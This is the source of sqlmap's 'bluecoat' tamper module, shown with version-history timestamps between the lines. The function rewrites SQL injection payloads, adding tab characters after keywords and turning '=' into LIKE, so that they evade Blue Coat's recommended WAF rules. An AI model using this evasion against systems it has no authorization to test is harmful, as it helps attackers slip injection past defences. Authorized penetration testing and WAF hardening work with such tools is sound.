sqlmap/tamper/bluecoat.py

52 lines
1.3 KiB
Python
Raw Normal View History

#!/usr/bin/env python
2012-11-03 22:15:22 +04:00
"""
2017-01-02 16:19:18 +03:00
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
2012-11-03 22:15:22 +04:00
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.data import kb
2012-11-03 22:15:22 +04:00
from lib.core.enums import PRIORITY
2012-11-05 16:09:53 +04:00
__priority__ = PRIORITY.NORMAL
2012-11-03 22:15:22 +04:00
def dependencies():
pass
2012-11-03 22:15:22 +04:00
2012-12-03 17:27:01 +04:00
def tamper(payload, **kwargs):
2012-11-05 16:09:53 +04:00
"""
Replaces space character after SQL statement with a valid random blank character.
Afterwards replace character = with LIKE operator
2012-11-03 22:15:22 +04:00
Requirement:
* Blue Coat SGOS with WAF activated as documented in
2012-11-03 22:15:22 +04:00
https://kb.bluecoat.com/index?page=content&id=FAQ2147
Tested against:
2012-11-05 16:09:53 +04:00
* MySQL 5.1, SGOS
2012-11-03 22:15:22 +04:00
Notes:
2012-11-05 16:09:53 +04:00
* Useful to bypass Blue Coat's recommended WAF rule configuration
>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
2012-11-05 16:09:53 +04:00
"""
2012-11-03 22:15:22 +04:00
def process(match):
word = match.group('word')
if word.upper() in kb.keywords:
return match.group().replace(word, "%s%%09" % word)
else:
return match.group()
2012-11-05 16:09:53 +04:00
retVal = payload
2012-11-03 22:15:22 +04:00
2012-11-05 16:09:53 +04:00
if payload:
retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", lambda match: process(match), retVal)
2012-11-05 16:09:53 +04:00
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
retVal = retVal.replace("%09 ", "%09")
2012-11-03 22:15:22 +04:00
2012-11-05 16:09:53 +04:00
return retVal